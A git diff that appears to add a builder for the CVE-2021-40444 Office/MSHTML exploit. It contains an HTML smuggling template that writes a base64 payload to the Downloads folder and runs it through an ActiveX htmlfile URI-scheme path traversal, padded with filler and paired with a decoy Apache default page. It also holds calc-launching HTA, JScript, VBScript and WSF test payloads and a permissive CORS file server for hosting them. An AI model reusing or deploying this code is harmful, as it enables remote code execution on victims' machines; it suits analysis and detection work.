// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</script>
</body>
</html>

109
template/cabless-smuggling-sample1.html

@ -0,0 +1,109 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2021-40444 (Cab-less)</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64) {
const binary_string = window.atob(base64);
const len = binary_string.length;
var bytes = new Uint8Array(len);
for (let i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
function isIE() {
ua = navigator.userAgent;
return ua.indexOf("MSIE ") > -1 || ua.indexOf("Trident/") > -1;
}
function save()
{
var file = '<BASE64_DATA_HERE>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: '<MIME_TYPE_HERE>'});
var fileName = '<INF_CHANGE_HERE>';
if (isIE()) {
navigator.msSaveBlob(blob, fileName);
} else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
}
</script>
<script>
function process(){
new ActiveXObject('htmlfile').Script.location = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
}
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</script>
<script>
save();
process();
</script>
</body>
</html>

376
template/index.html

@ -0,0 +1,376 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Ubuntu Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Ubuntu Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#files">Config files</a>
</div>
</div>
-->
<div class="content_section floating_element">
<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">
<p>
This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Ubuntu systems.
It is based on the equivalent page on Debian, from which the Ubuntu Apache
packaging is derived.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should <b>replace this file</b> (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.
</p>
<p>
If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.
</p>
</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">
<p>
Ubuntu's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Ubuntu tools. The configuration system is
<b>fully documented in
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt>
package was installed on this server.
</p>
<p>
The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows:
</p>
<pre>
/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf
</pre>
<ul>
<li>
<tt>apache2.conf</tt> is the main configuration
file. It puts the pieces together by including all remaining configuration
files when starting up the web server.
</li>
<li>
<tt>ports.conf</tt> is always included from the
main configuration file. It is used to determine the listening ports for
incoming connections, and this file can be customized anytime.
</li>
<li>
Configuration files in the <tt>mods-enabled/</tt>,
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
particular configuration snippets which manage modules, global configuration
fragments, or virtual host configurations, respectively.
</li>
<li>
They are activated by symlinking available
configuration files from their respective
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
<li>
The binary is called apache2. Due to the use of
environment variables, in the default configuration, apache2 needs to be
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the
default configuration.
</li>
</ul>
</div>
<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>
<div class="content_section_text">
<p>
By default, Ubuntu does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a>
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.
</p>
<p>
The default Ubuntu document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.
</p>
</div>
<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">
<p>
Please use the <tt>ubuntu-bug</tt> tool to report bugs in the
Apache2 package with Ubuntu. However, check <a
href="https://bugs.launchpad.net/ubuntu/+source/apache2"
rel="nofollow">existing bug reports</a> before reporting a new bug.
</p>
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.
</p>
</div>
</div>
</div>
<div class="validator">
</div>
</body>
</html>

BIN
data/NK36QZW9A0TY.dll → test/calc.dll

Binary file not shown.

11
test/calc.hta

@ -0,0 +1,11 @@
<script language="VBScript">
Function Calc()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "cmd /c calc.exe"
Set wsh = Nothing
End Function
Calc
self.close
</script>

6
test/calc.js

@ -0,0 +1,6 @@
function calc(){
var x = new ActiveXObject("WScript.shell");
x.Run("cmd /c calc");
}
calc();

8
test/calc.vbs

@ -0,0 +1,8 @@
Function Calc()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "cmd /c calc.exe"
Set wsh = Nothing
End Function
Calc

1
test/job-jscript.wsf

@ -0,0 +1 @@
<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job>

1
test/job-vbs.wsf

@ -0,0 +1 @@
<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job>

2
test/test.js

@ -0,0 +1,2 @@
var o = new ActiveXObject('htmlfile').Script.location='.wsf:../../../../../Users/d3adc0de.PCOIPTEST/Downloads/YK2TLVILEHG2.rar?.wsf';
WScript.Echo(o);
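Review bot: the `Script.location` value in test/test.js hard-codes a specific user profile (`Users/d3adc0de.PCOIPTEST`) and archive name (`YK2TLVILEHG2.rar`), so this test only runs on the author's machine and leaks the test environment's username into the repository; the other template files in this commit already use placeholder tokens such as `<RAR_CHANGE_HERE>`, so either reuse that convention here or add a one-line comment marking the file as a local-only scratch test (the commit also lists `test` in .gitignore, which suggests it was not meant to be committed at all).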

51
util/server.py

@ -0,0 +1,51 @@
import argparse
import sys
from builtins import Exception
from http.server import HTTPServer, SimpleHTTPRequestHandler
from werkzeug.serving import ForkingMixIn
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate')
return super(CORSRequestHandler, self).end_headers()
def do_OPTIONS(self):
self.do_GET()
class ForkingHTTPServer(ForkingMixIn, HTTPServer):
def finish_request(self, request, client_address):
try:
request.settimeout(15)
# "super" can not be used because BaseServer is not created from object
HTTPServer.finish_request(self, request, client_address)
except Exception as e:
print(f"[-] {e}")
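Review bot: `from werkzeug.serving import ForkingMixIn` pulls in a third-party dependency for a class the standard library already provides as `socketserver.ForkingMixIn` (Unix only; `socketserver.ThreadingMixIn` is the portable choice), and `from builtins import Exception` is redundant since `Exception` is always in scope. In `CORSRequestHandler`, `do_OPTIONS` delegates to `do_GET`, so a preflight request receives the full file body rather than a header-only reply; `self.send_response(200)` followed by `self.end_headers()` is the conventional behaviour. The module also has no docstring or `--help` text visible here describing what the server is for, which the rest of the util/ directory would benefit from.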